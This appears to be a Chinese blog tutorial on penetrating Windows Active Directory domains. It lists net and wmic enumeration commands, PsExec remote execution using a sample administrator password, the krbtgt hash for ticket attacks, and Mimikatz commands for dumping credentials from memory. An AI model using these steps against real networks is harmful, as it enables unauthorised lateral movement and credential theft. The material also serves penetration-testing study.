域渗透详解

什么是域?

将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器,域控制器中保存着整个域的用户帐号和安全数据库。

域的优点

1.权限管理集中,管理成本低

2.保密性加强
有利于企业的一些保密资料的管理,可以单独对资源进行权限控制,允许或拒绝特定的域账户对资源的请求。

3.安全性加强
使用漫游账户和文件夹重定向,个人账户的工作文件及数据等可以存储在服务器上,进行统一备份及管理,使用户的数据更加安全有保障;同时域控制器能够分发应用程序、系统补丁,用户可以选择安装,也可以由系统管理员指派自动安装,数据及系统安全性大大提高。

4.提高了便捷性

域的特点

域成员在登陆的时候,可以选择登录到除了域管以外的所有计算机

域渗透思路

通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登录到任何成员主机的特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器,渗透整个内网。

域渗透常用指令

查看域控制器的主机名,查看完之后主机名后面会多一个$

net group "domain controllers" /domain
或
net time /domain


查看所有域成员计算机列表

net group "domain computers" /domain

查看管理员的用户名

net group "domain admins" /domain

查看所有域用户

net user /domain

查看域管IP

ping -a 主机名

查看域管密码时效信息

net user administrator /domain

查看域列表

net view /domain

查看 testdomain域中的计算机列表

net view /domain:testdomain

其中,有一个特殊用户叫做krbtgt,该用户是用于Kerberos身份验证的账户,获得了该用户的hash,就可以进行票据传递攻击
还有一些指令

查询当前登陆域:net config workstation

查询域密码策略:net accounts /domain

查看补丁信息:wmic qfe

查看操作系统类型:wmic os

域渗透工具

PSexec

PSexec是一个远程执行的工具,可以远程连接同在一个域内的主机,并且不光是域管理员可以连域成员的主机,域成员也可以连域管的主机,前提是知道用户名和密码。
常用的命令如下:

远程连接主机
psexec \\192.168.33.11 -u administrator -p 123456 cmd

想要远程机器运行程序
psexec \\192.168.33.11 -u administrator -p 123456 -d -s -i calc

打开网页
psexec \\192.168.33.11 -u administrator -p 123456 -i -d cmd /c start http:// www.baidu.com

-s 以system身份运行
-i 交互式,对方主机也会看到执行的操作
-d 执行完命令后返回,不等待命令执行结束

能执行命令的前提条件是对方机器必须开启ipc及admin,否则会报错拒绝访问

net share ipc$
net share admin$

PSexec官方命令文档

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

PSexec在第一连接的时候会在域内的主机弹窗,这是一个BUG,所以在第一次连接的时候,一定要带上一个参数

psexec /accepteula...

mimicatz

下载地址

https://github.com/gentilkiwi/mimikatz/releases

常用的命令,运行的时候要以管理员身份运行,否则会报错

privilege::debug  提升到system权限
sekurlsa::logonpasswords  查找域内主机的密码

   Reprint policy


《域渗透详解》 by xiao is licensed under a Creative Commons Attribution 4.0 International License
 Previous
WiFi pineapple 操作指南 WiFi pineapple 操作指南
0x00 简介WiFi Pineapple 是由国外无线安全审计公司Hak5开发并售卖的一款无线安全测试神器(俗称大菠萝),里面有许多内置的模块,给我们提供一些无线安全测试的方法。本文主要讲大菠萝的配置和使用。 0x01 配置web管理界面
2019-09-22 xiao
Next 
thinkphp5.0远程代码执行漏洞利用分析 thinkphp5.0远程代码执行漏洞利用分析
环境版本:thinkphp5.0.20(实际环境<5.0.23即可)配置:apache2,php5- 简介2018年thinkphp官方更新了补丁,说明“由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可能get
2019-08-30 xiao
  TOC